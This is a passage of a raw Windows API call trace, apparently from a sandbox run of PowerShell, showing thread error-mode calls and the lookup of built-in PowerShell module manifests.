SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3a0) returned 1 [0286.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d290) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3a0) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d290) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3b0) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d400) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2f0) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d540) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d480) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d530) returned 1 [0286.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0286.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0286.597] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0286.601] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0286.602] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0286.618] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f81150 [0286.618] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f81150, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.618] CoTaskMemFree (pv=0x25b73f81150) [0286.619] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0286.619] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0286.619] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f819d0 [0286.619] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f819d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.619] CoTaskMemFree (pv=0x25b73f819d0) [0286.619] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0286.619] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0286.619] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7fe30 [0286.619] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7fe30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.619] CoTaskMemFree (pv=0x25b73f7fe30) [0286.619] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0286.619] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0286.619] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7cb30 [0286.620] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7cb30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.620] CoTaskMemFree (pv=0x25b73f7cb30) [0286.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0286.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0286.620] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f83bd0 [0286.620] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f83bd0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.620] CoTaskMemFree (pv=0x25b73f83bd0) [0286.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0286.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0286.620] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e4b0 [0286.620] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e4b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.620] CoTaskMemFree (pv=0x25b73f7e4b0) [0286.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0286.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0286.621] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84010 [0286.621] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84010, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.621] CoTaskMemFree (pv=0x25b73f84010) [0286.621] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0286.621] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0286.621] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f808d0 [0286.621] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f808d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.621] CoTaskMemFree (pv=0x25b73f808d0) [0286.621] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0286.621] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0286.621] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f80490 [0286.621] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f80490, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.621] CoTaskMemFree (pv=0x25b73f80490) [0286.621] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0286.621] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0286.621] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e290 [0286.622] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e290, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.622] CoTaskMemFree (pv=0x25b73f7e290) [0286.622] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0286.622] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0286.622] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f808d0 [0286.622] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f808d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.622] CoTaskMemFree (pv=0x25b73f808d0) [0286.622] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0286.622] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0286.622] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7d3b0 [0286.622] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7d3b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.622] CoTaskMemFree (pv=0x25b73f7d3b0) [0286.622] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0286.622] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0286.622] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f390 [0286.622] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7f390, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.623] CoTaskMemFree (pv=0x25b73f7f390) [0286.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0286.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0286.623] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7cb30 [0286.623] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7cb30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.623] CoTaskMemFree (pv=0x25b73f7cb30) [0286.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0286.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0286.623] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f80490 [0286.623] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f80490, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.623] CoTaskMemFree (pv=0x25b73f80490) [0286.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0286.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0286.623] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84450 [0286.623] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84450, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.624] CoTaskMemFree (pv=0x25b73f84450) [0286.624] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0286.624] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71 [0286.624] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82ad0 [0286.624] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82ad0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.624] CoTaskMemFree (pv=0x25b73f82ad0) [0286.624] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71 [0286.624] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41 [0286.624] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f83bd0 [0286.624] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f83bd0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.624] CoTaskMemFree (pv=0x25b73f83bd0) [0286.624] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41 [0286.624] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b [0286.624] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7da10 [0286.624] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7da10, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.624] CoTaskMemFree (pv=0x25b73f7da10) [0286.625] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b [0286.625] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65 [0286.625] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7d7f0 [0286.625] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7d7f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.625] CoTaskMemFree (pv=0x25b73f7d7f0) [0286.625] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65 [0286.625] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53 [0286.625] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e4b0 [0286.625] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e4b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.625] CoTaskMemFree (pv=0x25b73f7e4b0) [0286.625] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, 